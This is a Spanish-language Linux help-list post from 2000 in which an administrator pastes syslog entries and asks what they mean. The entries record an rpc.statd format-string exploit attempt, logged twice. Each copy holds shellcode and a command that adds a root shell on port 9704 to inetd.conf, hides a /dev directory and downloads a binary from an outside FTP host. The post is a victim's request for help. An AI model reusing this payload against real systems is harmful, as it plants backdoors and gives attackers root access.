Ataque
Andrés M. Benavides
dakar en axtel.net
Mar Ago 29 14:58:56 CDT 2000
Buen día:
Hace poco se posteó un boletín de seguridad aquí en el foro, ok pues
inmediatamente me dí a la tarea de actualizar lo necesario pero
revisando los logs me encontré con ésto en el /var/log/messages se los
mando a ver si alguien me puede ayudar a interpretar. Gracias
Aug 27 23:40:33 quad rpc.statd[397]: SM_MON request for hostname
containing'/':^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ
¿%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%08x%
0242x%n%055x%n%012x%n%0192x%n<90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90>ëK^<89>v¬<83>î<8D>^
(<83>Æ<89>^°<83>î<8D>^.<83>Æ<83>Ã<83>ë#<89>^´1À<83>î<88>F'<88>F*<83>Æ
<88>F«<89>F¸°+, <89>ó<8D>N¬<8D>V¸Í<80>1Û<89>Ø@Í<80>è°ÿÿÿ/bin/sh -c echo
9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall-HUP
inetd; mkdir /dev/... ; cd /dev/... ; ncftpget
ftp://sctrx:sctrxz@206.132.179.136/imp ;chmod+x imp
Aug 27 23:40:33 quad rpc.statd[397]: POSSIBLE SPOOF/ATTACK ATTEMPT!
Aug 27 23:40:33 quad rpc.statd[397]: STAT_FAIL to localhost for SM_MON
of ^D÷ÿ¿^D÷ÿ¿^E÷ÿ¿^E÷ÿ¿^F÷ÿ¿^F÷ÿ¿^G÷ÿ¿^G÷ÿ¿%08x %08x %08x %08x %08x
%08x%08x%08x%08x%08x%08x%08x%08x%08x%0242x%n%055x%n%012x%n%0192x%n<90
90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>
<90><90><90><90><90><90><90><90><90><90><90><90><90><90>ëK^<89>v¬<83>î
<8D>^(<83>Æ<89>^°<83>î<8D>^.<83>Æ<83>Ã<83>ë#<89>^´1À<83>î<88>F'<88>F*<83>Æ
<88>F«<89>F¸°+, <89>ó<8D>N¬<8D>V¸Í<80>1Û<89>Ø@Í<80>è°ÿÿÿ/bin/sh -c echo
9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall
-HUP inetd; mkdir /dev/... ; cd /dev/... ; ncftpget ftp://sctrx:sctr
xz en 206.132.179.136/imp ; chmod +x imp
--
In a world without fences,... who needs gates?
Salu2!
___________________
Andrés M. Benavides
ICQ: 3341979
--
In a world without fences,... who needs gates?
Salu2!
___________________
Andrés M. Benavides
ICQ: 3341979
---------------------------------------------------------
para salir de la lista, enviar un mensaje con las palabras
"unsubscribe ayuda" en el cuerpo a majordomo en linux.org.mx
Más información sobre la lista de distribución Ayuda